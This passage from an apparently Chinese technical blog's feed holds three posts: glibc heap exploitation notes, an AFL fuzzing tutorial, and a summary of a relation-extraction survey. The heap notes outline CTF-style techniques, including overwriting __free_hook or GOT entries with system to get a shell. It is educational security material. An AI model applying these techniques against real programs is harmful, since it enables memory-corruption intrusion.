class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs xl"> <span class="hljs-keyword">else</span> <span class="hljs-comment">//size大于等于</span><br> {<br> <span class="hljs-function"><span class="hljs-title">assert</span> ((fwd-></span>size & NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br> <span class="hljs-function"><span class="hljs-title">while</span> ((unsigned long) size < fwd-></span>size) <br> {<br> <span class="hljs-function"><span class="hljs-title">fwd</span> = fwd-></span>fd_nextsize;<br> <span class="hljs-function"><span class="hljs-title">assert</span> ((fwd-></span>size & NON_MAIN_ARENA) == <span class="hljs-number">0</span>);<br> }<br> <br> <span class="hljs-function"><span class="hljs-title">if</span> ((unsigned long) size == (unsigned long) fwd-></span>size)<br> <span class="hljs-comment">/* Always insert in the second position. */</span><br> <span class="hljs-function"><span class="hljs-title">fwd</span> = fwd-></span>fd;<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-function"><span class="hljs-title">victim</span>-></span>fd_nextsize = fwd;<br> <span class="hljs-function"><span class="hljs-title">victim</span>-></span><span class="hljs-function"><span class="hljs-title">bk_nextsize</span> = fwd-></span>bk_nextsize;<br> <span class="hljs-function"><span class="hljs-title">fwd</span>-></span>bk_nextsize = victim;<br> <span class="hljs-function"><span class="hljs-title">victim</span>-></span><span class="hljs-function"><span class="hljs-title">bk_nextsize</span>-></span>fd_nextsize = victim;<br> }<br> <span class="hljs-function"><span class="hljs-title">bck</span> = fwd-></span>bk;<br> }<br>}<br></code></pre></td></tr></table></figure></li><li><p>选择完成后挂入largebin</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs abnf">victim->bk <span class="hljs-operator">=</span> bck<span class="hljs-comment">;</span><br>victim->fd <span class="hljs-operator">=</span> fwd<span class="hljs-comment">;</span><br>fwd->bk <span class="hljs-operator">=</span> victim<span class="hljs-comment">;</span><br>bck->fd <span class="hljs-operator">=</span> victim<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li></ol><h2 id="Tcache"><a href="#Tcache" class="headerlink" title="Tcache"></a>Tcache</h2><p>(自2.26tcache出现后,经过了不少变化,有空再更新)</p><ol><li><p>一次 malloc 时,会先 malloc 一块内存用来存放 <code>tcache_perthread_struct</code> 。</p></li><li><p>tcache中最多存储7个chunk</p></li><li><p>在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。</p><p>(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin 链上的其他内存块放入 tcache 中。</p><p>(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin 链上的其他内存块放入 tcache 中。</p><p>(3)当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。</p></li><li><p>在 free 函数的最先处理部分,首先是检查释放块是否页对齐及前后堆块的释放情况,便优先放入 tcache 结构中。</p></li></ol><h2 id="Largebin-attack"><a href="#Largebin-attack" class="headerlink" title="Largebin attack"></a>Largebin attack</h2><p>利用条件:</p><ol><li>可以修改一个 large bin chunk 的 data</li><li>从 unsorted bin 中来的 large bin chunk 要紧跟在被构造过的 chunk 的后面</li></ol><p>利用方式(利用上文提到的fwd->bk_nextsize->fd_nextsize = victim):</p><ol><li>修改largebin中chunk1的bk_nextsize为&target-0x20</li><li>向largebin挂入size相邻的chunk2,注意使size:chunk2<chunk1时才能实现利用</li></ol><p>利用思路:</p><ol><li>修改 _IO_list_all 便于伪造 _IO_FILE 结构体进行 FSOP</li><li>修改global_max_fast</li></ol><h2 id="Tcache-attack"><a href="#Tcache-attack" class="headerlink" title="Tcache attack"></a>Tcache attack</h2><p>tcache中的不少技巧与fastbin是相似的,值得注意的是,在有tcache的情况下,要把tcache填满再进行另外的操作</p>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>从AFL开始fuzzing</title>
<link href="/2022/01/20/%E4%BB%8EAFL%E5%BC%80%E5%A7%8Bfuzzing/"/>
<url>/2022/01/20/%E4%BB%8EAFL%E5%BC%80%E5%A7%8Bfuzzing/</url>
<content type="html"><![CDATA[<h2 id="关于Fuzzing"><a href="#关于Fuzzing" class="headerlink" title="关于Fuzzing"></a>关于Fuzzing</h2><p>fuzzing,模糊测试。其与包括静态分析、动态分析、代码审计等传统漏洞检测方式的最大区别,就在于它可以大规模随机或半随机地生成测试数据,并以使程序crash为目标进行测试。这种方法被证明相当高效,可以敏锐地发掘代码中潜在地各种堆栈溢出等常见漏洞,也能用assert去调试非内存越界的问题(比如CVE-2014-3570 in OpenSSL)。</p><p>同样,fuzzing也有一定的局限性</p><ul><li>难以确定何时停止</li><li>对目标的设置和输入源都由你自己控制</li><li>可能卡在某一个对数据的检测中不能自拔</li><li>只有部分类型的问题可以被fuzzer发现</li></ul><p>不过fuzzing不失为一种强大的测试方法,就先从声名远扬的AFL(<a href="http://lcamtuf.coredump.cx/afl/">American fuzzy lop</a>)的使用开始吧。</p><h2 id="quickstart"><a href="#quickstart" class="headerlink" title="quickstart"></a>quickstart</h2><p>本次测试源码也都来自afl-training<a href="https://github.com/mykter/afl-training/tree/main">https://github.com/mykter/afl-training/tree/main</a></p><p>只需要两行代码就能感受到afl的快乐了</p><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">//在对源码调试时,使用afl提供的gcc作为gcc/g++的<span class="hljs-keyword">wrapper</span>编译目标程序才能让afl进行插桩<br>CC=afl-clang-fast AFL_HARDEN=<span class="hljs-number">1</span> make <br>afl-fuzz -i inputs -o <span class="hljs-keyword">out</span> ./vulnerable<br></code></pre></td></tr></table></figure><p><img src="/image-20220119125948344.png"></p><p>如果出现这个提示只需要照做就行</p><p>建议在非root的情况下运行,这样产生的结果不会有权限问题。运行一段时间后,在out的crashes中查看结果,可以用cat打开,如果你觉得乱码看其来不舒服,也可以用vim打开。复现结果时,直接把这些crash输入就可以了</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">.<span class="hljs-regexp">/vulnerable < out/</span><span class="hljs-keyword">default</span><span class="hljs-regexp">/crashes/</span>[<span class="hljs-keyword">file</span>]<br></code></pre></td></tr></table></figure><p>afl基本功能的实现我们可以从图中的总览来理解</p><p><img src="/image-20220119170921897.png"></p><h2 id="harness"><a href="#harness" class="headerlink" title="harness"></a>harness</h2><p>上面是对afl基本操作的体验,实际情况下的程序会有不同功能,我们需要用harness进行具体的调试</p><ol><li><p>编写harness,适用于有程序源码的情况</p><p>harness基本要求:</p><ul><li><p>可运行</p></li><li><p>有效对输入内容进行处理</p><p>数据输入有两种方法,一种使直接用stdin输入</p><p>编写程序从stdin读取数据,输入到原代码中要调试的位置</p><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><span class="hljs-comment">//buffer型</span><br>ssize_t length;<br><span class="hljs-keyword">char</span> input[<span class="hljs-keyword">SIZE</span>] = {<span class="hljs-number">0</span>};<br>length = <span class="hljs-keyword">read</span>(STDIN_FILENO, input, <span class="hljs-keyword">SIZE</span>); <span class="hljs-comment">//STDIN_FILENO为source,input为dest,SIZE为自定义常量</span><br><br><span class="hljs-comment">//int型</span><br><span class="hljs-keyword">int</span> a = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">read</span>(STDIN_FILENO, &a, <span class="hljs-number">4</span>); <span class="hljs-comment">//直接从输入流中转换一个整数</span><br></code></pre></td></tr></table></figure><p>另一种是使用文件输入</p><p>步骤分为三步:</p><ol><li>从命令行读取文件地址</li><li>代码打开文件,读取到缓冲区</li><li>传输内容到测试区块</li></ol><p>对不同类型的数据,input不需要作特别的更改,afl的输入算法会自动生成合理的数据</p></li><li><p>运行结束自动退出</p></li><li><p>对非目标的crash,使用error代替crash</p></li><li><p>跳过程序中可能存在的对数据的检测(否则afl会花费大量时间来生成可以通过检测的数据)</p></li></ul></li><li><p>把原代码和harness编译到一起</p><p>harness</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">"library.h"</span></span><br><br><span class="hljs-comment">// 确定一个能覆盖你要调试部分所需输入的最大size</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>* argv[])</span> </span>{<br><span class="hljs-keyword">if</span>((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"echo"</span>) == <span class="hljs-number">0</span>) {<br><span class="hljs-comment">// 确定要调试的功能,当然也可直接一起调试,输入内容不重要,长度设置好就行了</span><br><span class="hljs-type">char</span> input[SIZE] = {<span class="hljs-number">0</span>};<br><br><span class="hljs-type">ssize_t</span> length;<br>length = <span class="hljs-built_in">read</span>(STDIN_FILENO, input, SIZE);<br><br><span class="hljs-built_in">lib_echo</span>(input, length);<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"mul"</span>) == <span class="hljs-number">0</span>) {<br><span class="hljs-type">int</span> a,b = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">read</span>(STDIN_FILENO, &a, <span class="hljs-number">4</span>);<br><span class="hljs-built_in">read</span>(STDIN_FILENO, &b, <span class="hljs-number">4</span>);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d\n"</span>, <span class="hljs-built_in">lib_mul</span>(a,b));<br>} <span class="hljs-keyword">else</span> {<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"Usage: %s mul|echo\n"</span>, argv[<span class="hljs-number">0</span>]);<br>}<br>}<br></code></pre></td></tr></table></figure><p>编译:</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm">AFL_HARDEN<span class="hljs-operator">=</span><span class="hljs-number">1</span> afl-clang-<span class="hljs-keyword">fast</span> harness.<span class="hljs-keyword">c</span> 原代码.<span class="hljs-keyword">c</span> -o 测试程序名称<br>#using <span class="hljs-keyword">one</span> of afl-clang-<span class="hljs-keyword">fast</span><span class="hljs-punctuation">,</span> afl-clang<span class="hljs-punctuation">,</span> <span class="hljs-keyword">or</span> afl-gcc<br></code></pre></td></tr></table></figure></li><li><p>开始调试</p><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">afl-fuzz -<span class="hljs-selector-tag">i</span> 输入文件夹名 -o 输出文件夹 ./测试程序<br></code></pre></td></tr></table></figure><p>可以通过对<code>(argc == 2) && strcmp(argv[1], "mul") == 0</code>的if判断,区别对哪一个部分进行调试,把具体调试方法写在if中,运行时就能实现功能的选择性调试。<br>此时应使用 <code>afl-fuzz -i in -o out ./harness echo</code>执行</p></li></ol><p>跑一会就出结果了,很简单的程序,输入pop!就自动结束进程。</p><p><img src="/image-20220116164828196.png"></p>]]></content>
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>对关系抽取综述的简单总结</title>
<link href="/2022/01/19/%E5%AF%B9%E5%85%B3%E7%B3%BB%E6%8A%BD%E5%8F%96%E7%BB%BC%E8%BF%B0%E7%9A%84%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93/"/>
<url>/2022/01/19/%E5%AF%B9%E5%85%B3%E7%B3%BB%E6%8A%BD%E5%8F%96%E7%BB%BC%E8%BF%B0%E7%9A%84%E7%AE%80%E5%8D%95%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><p>传统综述中把关系抽取分为2类:supervised and semi-supervised methods</p><p>监督方法:需要标注数据,获取成本高</p><p> 模型只适合处理训练集中文本域,对其他文本内容处理效果不好</p><p>半监督方法:大大减少了人工成本,仍需要初始的关系对</p><p>无监督方法:效果太差了,不讨论</p><p>远程监督(Distant supervision):结合半监督和无监督的优点,使用三元组(通常使用Resource Description Framework标准表示)和知识库,但比传统方法更容易产生噪音(missing labels (false negatives) and wrong labels (false positives) )</p><p>远程监督分为3个方面:noise reduction approaches, embeddings-based approaches, and approaches leveraging auxiliary information</p><p>Noise reduction approaches:解决远程监督中的各种问题,在知识库提供关系的前提下预测实体间关系</p><p>Embeddings-based approaches:使用实体和关系的向量表示来实现关系抽取。</p><p>approaches leveraging auxiliary information:使用辅助信息,比如实体类别、逻辑等辅助关系抽取</p><p>上面三个方法互不冲突,可以相互结合</p><p><img src="/image-20220118085727754.png"></p><p>对上次没提到的一些名词解释:</p><ul><li>bag:包含相同实体对的一连串句子</li><li>mention-level relation extraction:给出一组包含同一实体对的句子,判断他们之间的关系是否相同</li></ul><h2 id="关系抽取具体定义"><a href="#关系抽取具体定义" class="headerlink" title="关系抽取具体定义"></a>关系抽取具体定义</h2><p>这里只讨论priori先验关系和binary relations二元关系</p><p>关系和实体并没有严格的定义,通常情况下我们定义</p><p>实体:名次或任何能作为主体的在知识库中的一个条目</p><p>关系:三元组中连接2个实体的就是关系</p><p>基本方法:</p><p><img src="/image-20220101135614048.png"></p><p>Preprocessing预处理:part-of-speech (POS) taggers(用于标识名次、介词等)</p><p> dependency parsers(基于二元关系表示语法结构,如 Dependency tree依赖树)</p><p> named entity recognizers (NER)(识别可能的实体)</p><p>Entity Matching实体匹配:将上一步识别的实体与知识库中实体进行匹配</p><p>Feature Extraction特征提取:这里是为了disambiguation消除歧义,需要用到预处理中提取到的信息</p><p>Labelling标识:获取每一个实体对在知识库中的标识</p><p>测试集的获取方法同理,只是去掉最后一步</p><p>基本关系抽取的主要问题:</p><ol><li>从知识库中自动获得的标签是有噪声的,因为提到一对实体的句子不一定表达关系;此外,不同的句子提到同一实体对,可以表达不同的关系。</li><li>知识库的不完全性对模型的训练和评价都造成了不利影响。</li></ol><h2 id="noise-reduction消除噪音"><a href="#noise-reduction消除噪音" class="headerlink" title="noise reduction消除噪音"></a>noise reduction消除噪音</h2><p>噪音是什么? 类似于概率统计中的第一类错误和第二类错误</p><p>本文详细讲述了4种方法</p><h3 id="At-least-one-model"><a href="#At-least-one-model" class="headerlink" title="At-least-one model"></a>At-least-one model</h3><p>考虑到两个实体之间的关系不止一种,如果两个实体参与了一种关系,那么至少有一个提到这两个实体的句子可以表达这种关系</p><p>相反的,我们称一般的模型为multi-instance single-label多个实例、单个标签</p><p><img src="/image-20220101145149365.png"></p><p>由于无法确定具体关系,先前的labelling无法进行,At-least-one model模型还需要对可能的关系进行预测,同样通过流水线方法实现</p><p>模型包含3大变量:</p><ul><li>X:包含 dependency path实体间依赖树等额外信息的词向量</li><li>Y:标识实体关系</li><li>Z:标识标识方法i是否是一个已知关系</li></ul><p>算法具体实现和参数参考此文章 Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions without labeled text. In Proceedings of the European Conference on Machine Learning and Knowledge Discovery in Databases (ECML PKDD’10). Springer, 148–163</p><h3 id="Data-Incompleteness-Handling"><a href="#Data-Incompleteness-Handling" class="headerlink" title="Data Incompleteness Handling"></a>Data Incompleteness Handling</h3><p>知识库的不完整性会导致模型识别错误:因为远程识别的基本方法是从知识库中匹配positive,消去negative的关系,训练中对negative的生成方式是提供不相关的实体对。这意味着在训练中标注的nagative可能并不等于实际关系的不存在。</p><p>不同的解决方法:</p><ol><li>MIML − RE<ul><li>Bonan Min, Ralph Grishman, Li Wan, Chang Wang, and David Gondek. 2013. Distant supervision for relation extraction with an incomplete knowledge base. In Proceedings of the Human Language Technologies Conference of the North American Chapter of the Association of Computational Linguistics. 777–782.</li></ul></li><li>MultiR<ul><li>Alan Ritter, Luke Zettlemoyer, Oren Etzioni, et al. 2013. Modeling missing data in distant supervision for information extraction. Trans. Assoc. Comput. Linguis. 1, 367–378.</li><li>Wei Xu, Raphael Hoffmann, Le Zhao, and Ralph Grishman. 2013. Filling knowledge base gaps for distant supervision of relation extraction. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL’13). 665–670.</li></ul></li><li>matrix completion对上述两个方法的总结性表述<ul><li>Miao Fan, Deli Zhao, Qiang Zhou, Zhiyuan Liu, Thomas Fang Zheng, and Edward Y. Chang. 2014. Distant supervision for relation extraction with matrix completion. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (ACL’14). 839–849.</li><li>Shiqian Ma, Donald Goldfarb, and Lifeng Chen. 2011. Fixed point and Bregman iterative methods for matrix rank minimization. Math. Program. 128 (2011), 321–353.</li></ul></li></ol><h3 id="Topic-Models"><a href="#Topic-Models" class="headerlink" title="Topic Models"></a>Topic Models</h3><p>topic:主题表示经常一起出现在文档中的术语(单词或模式)集群</p><p>这个方法旨在为每一个术语分配topic,计算单词w属于主题t的条件概率</p><p>mention-level为每个句子单独分配一个关系,而此方法能够找到文本模式和关系之间更一般的依赖关系,这可以提高性能,并且可以根据已知的模式套用到未知的模式中,比如 A为在B的教授工作与A为在B的人类学家工作。</p><p>参考文献:</p><ul><li>David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet allocation. J. Mach. Learn. Res. 3 (2003), 993–1022.</li></ul><h3 id="Pattern-Correlations"><a href="#Pattern-Correlations" class="headerlink" title="Pattern Correlations"></a>Pattern Correlations</h3><p>这种方法是对训练数据的过滤,将表达关系的模式与不表达关系的模式区分开,设置一个不表达对应关系的模式列表。</p><p>如果一个句子包含否定列表中的一个模式,那么对应的标签将被删除。因此,它们减少了远距离监督所分配的错误标签的数量。</p><p>参考文献:</p><ul><li>Shingo Takamatsu, Issei Sato, and Hiroshi Nakagawa. 2012. Reducing wrong labels in distant supervision for relation extraction. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics. 721–729.</li><li>Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction without labeled data. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP. 1003–1011.</li><li>Bonan Min, Xiang Li, Ralph Grishman, and Ang Sun. 2012. New york university 2012 system for KBP slot filling. In Proceedings of the 5th Text Analysis Conference (TAC’12).</li></ul><h2 id="EMBEDDINGS-BASED-METHODS词向量"><a href="#EMBEDDINGS-BASED-METHODS词向量" class="headerlink" title="EMBEDDINGS-BASED METHODS词向量"></a>EMBEDDINGS-BASED METHODS词向量</h2><p>noise reduction中的方法基于文本特征,而此方法将关系和实体对的文本表示映射到向量空间的方法,它的意义在于把文本处理和数学、机器学习连接起来,问题在于如何用NLP技术生成高质量地embedding</p><p>embedding就是从离散对象到实数向量的映射过程,通常通过named entity recognition tool命名实体识别工具获得</p><p>Skip-gram模型获得词向量: Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word representations in vector space. arXiv Preprint arXiv:1301.3781.</p><p>分段卷积神经网络(PCNNs)进行关系提取: Daojian Zeng, Kang Liu, Yubo Chen, and Jun Zhao. 2015. Distant supervision for relation extraction via piecewise convolutional neural networks. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing (EMNLP’15). 1753–1762</p><h2 id="LEVERAGING-AUXILIARY-INFORMATION-FOR-SUPERVISION利用辅助信息"><a href="#LEVERAGING-AUXILIARY-INFORMATION-FOR-SUPERVISION利用辅助信息" class="headerlink" title="LEVERAGING AUXILIARY INFORMATION FOR SUPERVISION利用辅助信息"></a>LEVERAGING AUXILIARY INFORMATION FOR SUPERVISION利用辅助信息</h2><ol><li>直接监督与远程监督结合</li><li>实体识别的影响</li><li>关系之间的逻辑连接(Logical Formulae)</li></ol><h2 id="数据集和模型评估"><a href="#数据集和模型评估" class="headerlink" title="数据集和模型评估"></a>数据集和模型评估</h2><p><img src="/image-20220117232049655.png"></p><p>KBP:Knowledge Base Population</p><p>远程监督要求大规模的数据集以保证每个特征出现的次数足够多</p><h3 id="评价"><a href="#评价" class="headerlink" title="评价"></a>评价</h3><p>指标:</p><ul><li>精确率:Precision,针对预测结果而言的,它表示的是预测为正的样本中有多少是真正的正样本</li><li>召回率:Recall,针对原来的样本而言的,它表示的是样本中的正例有多少被预测正确了</li><li>F值:综合考虑精确率和召回率F1 = (2<em>P</em>R)/(P+R)</li></ul><p>常用的比较方法是precision-recall curves</p><p>由于知识库中的关系不完整性,正确提取的关系数量是被低估的。此外,实际提及关系的数量是未知的;它可以粗略估计为被提取的实体对之间在知识库中的关系数。</p><p>通常,研究人员会进行两种类型的评估:</p><ul><li><p>held-out evaluations,在训练过程中隐藏部分知识库数据,并将新提取的关系与该封锁数据进行比较;</p></li><li><p>manual evaluations,其中一小部分数据由人工评估人员注释,通常使用众包。</p></li></ul><p>这两种方法都存在一些缺点。在held-out评估中,知识库不完整的事实会影响测试集,即:,所提取的关系可能被错误的标记是不正确的。因此,保留评估低估了算法的性能。然而,手工评估提供更准确的结果,但只适用于数据的一个相对较小的子集。</p><p>不知道各位有没有注意到,以上的内容似乎都是在NER标签实体识别的基础上考虑的关系抽取,并没有提到联合学习。关于联合学习的处理可能还要在进一步拓展,不过也可以先从看现有的模型代码开始。</p>]]></content>
<tags>
<tag>NLP</tag>
</tags>
</entry>
<entry>
<title>堆学习整理(一)</title>
<link href="/2021/11/28/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%B8%80%EF%BC%89/"/>
<url>/2021/11/28/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%B8%80%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="malloc"><a href="#malloc" class="headerlink" title="malloc"></a>malloc</h2><p>chunksize和2*size_sz对齐(64位下为16字节)</p><p>如果malloc大小不对齐,大于8向上取整,小于等于8向下取整</p><h2 id="fastbin"><a href="#fastbin" class="headerlink" title="fastbin"></a>fastbin</h2><ol><li>单链表</li><li><strong>fd指针指向先进入bin的chunk,使用LIFO策略</strong></li><li>free时不会合并,即使与未分配区域相邻也不会合并</li><li>不清空prev_inuse</li><li>大小为整数0x20~0x80共7个</li><li>glibc 要求 chunk 块至少可以存储 4 个必要的字段。例如malloc(size),size<16,自动分配对齐0x20。</li><li>常用的0x7f对应的大小为0x70的fastbin(即分配0x60)</li><li>仅检测fastbin头部是否存在doublefree</li></ol><h2 id="unsorted-bin"><a href="#unsorted-bin" class="headerlink" title="unsorted bin"></a>unsorted bin</h2><ol><li><p>双链表</p></li><li><p>大小不符合fastbin</p></li><li><p>第一个进入的chunk,其fd,bk指向main_arean固定偏移处,后续<strong>bk指向后进入的chunk,fd指向先进入的chunk</strong>,与main_arean构成循环双向链表</p></li><li><p>free时会触发unlink,合并物理地址相邻的chunk</p></li><li><p>使用方式:Unsorted Bin 在使用的过程中,采用的遍历顺序是 <strong>FIFO</strong>,<strong>即插入的时候插入到 unsorted bin 的头部,取出的时候从链表尾获取</strong>。</p><p>在程序 malloc 时,如果在 fastbin,small bin 中找不到对应大小的 chunk,就会尝试从 Unsorted Bin 中寻找 chunk。如果取出来的 chunk 大小刚好满足,就会直接返回给用户,否则就会把这些 chunk 分别插入到对应的 bin 中。</p></li></ol><h2 id="Tcache"><a href="#Tcache" class="headerlink" title="Tcache"></a>Tcache</h2><ol><li><p>一次 malloc 时,会先 malloc 一块内存用来存放 <code>tcache_perthread_struct</code> 。</p></li><li><p>free 内存,且 size 小于 small bin size (0x400)时</p><p>tcache 出现之前会放到 fastbin 或者 unsorted bin 中</p><p>tcache 出现后:</p><ul><li>先放到对应的 tcache 中,直到 tcache 被填满(默认是 7 个)</li><li>tcache 被填满之后,再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中</li><li>tcache 中的 chunk 不会合并(不取消 inuse bit)</li><li><strong>LIFO</strong></li></ul></li><li><p>malloc 内存,且 size 在 tcache 范围内</p></li><li><p>先从 tcache 取 chunk,直到 tcache 为空、</p></li><li><p>tcache 为空后,从 bin 中找</p></li><li><p>tcache 为空时,如果 <code>fastbin/smallbin/unsorted bin</code> 中有 size 符合的 chunk,会先把 <code>fastbin/smallbin/unsorted bin</code> 中的 chunk 放到 tcache 中,直到填满。之后再从 tcache 中取;因此 chunk 在 bin 中和 tcache 中的顺序会反过来</p></li></ol><h2 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h2><p>经典的就是double free,在fastbin或者tcache实现</p><p>流程如下</p><ol><li>doublefree</li><li>修改freed chunk的bins链,实现任意地址写</li><li>找libc基址</li><li>现在有两个方法,一是改malloc__hook为one_gadget然后malloc,这需要特殊条件,但胜在简单;二是改free__hook为system地址,然后free一个内容为/bin/sh的chunk即可</li></ol><h2 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h2><ol><li>要求:需要获取存储chunk地址的数组地址</li><li>堆内容:可以控制chunk[a]中的内容,布置fd,bk分别为&chunk[a]-0x18,&chunk[a]-0x10,并堆溢出改写其相邻的fakechunk的prevsize和prev_inuse(和size在同一字节)。</li><li>其中的chunksize检查除了可以伪造size等于fakechunk中prev_size,因为prev_size只用于找到上一个chunk的开始地址,所以也可以在chunk[a]里再伪造一个相邻chunk,使其prev_size=伪造的chunksize。限于glibc<=2.28</li><li>效果:可以更改数组中,fakechunk前一个存储chunk[a]地址为&chunk[a]-0x18</li><li>用处:改写got表,一是改写free为system,二是改写atoi为system,两者都是通过再次调用被修改的函数,以/bin/sh为参数实现getshell</li></ol><h2 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h2><h3 id="house-of-spirit"><a href="#house-of-spirit" class="headerlink" title="house of spirit"></a>house of spirit</h3><ol><li>fake chunk 的 ISMMAP 位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理。</li><li>fake chunk 地址需要对齐, MALLOC_ALIGN_MASK</li><li>fake chunk 的 size 大小需要满足对应的 fastbin 的需求,同时也得对齐。</li><li>fake chunk 的 next chunk 的大小不能小于 <code>2 * SIZE_SZ</code>,同时也不能大于<code>av->system_mem</code> 。</li><li>fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free 的情况。</li></ol><p>查看free中的fastbin相关的处理源码:</p><figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs livescript"><span class="hljs-keyword">if</span> ((unsigned long)(size) <= (unsigned long)(get_max_fast ())<br><br> ...<br> <span class="hljs-comment">## 对size进行基本的检查</span><br> <span class="hljs-keyword">if</span> <span class="hljs-function"><span class="hljs-params">(__builtin_expect (chunk_at_offset (p, size)->size <= <span class="hljs-number">2</span> * SIZE_SZ, <span class="hljs-number">0</span>)</span></span><br><span class="hljs-params"><span class="hljs-function"> || __builtin_expect (chunksize (chunk_at_offset (p, size))</span></span><br><span class="hljs-params"><span class="hljs-function"> >= av->system_mem, <span class="hljs-number">0</span>))</span></span><br><span class="hljs-function"> {</span><br><span class="hljs-function"> ...</span><br><span class="hljs-function"> ## 对<span class="hljs-title">next</span> <span class="hljs-title">chunk</span>的<span class="hljs-title">size</span>进行检查</span><br><span class="hljs-function"> <span class="hljs-title">if</span> <span class="hljs-params">(chunk_at_offset (p, size)->size <= <span class="hljs-number">2</span> * SIZE_SZ</span></span><br><span class="hljs-params"><span class="hljs-function"> || chunksize (chunk_at_offset (p, size)) >= av->system_mem;</span></span><br><span class="hljs-params"><span 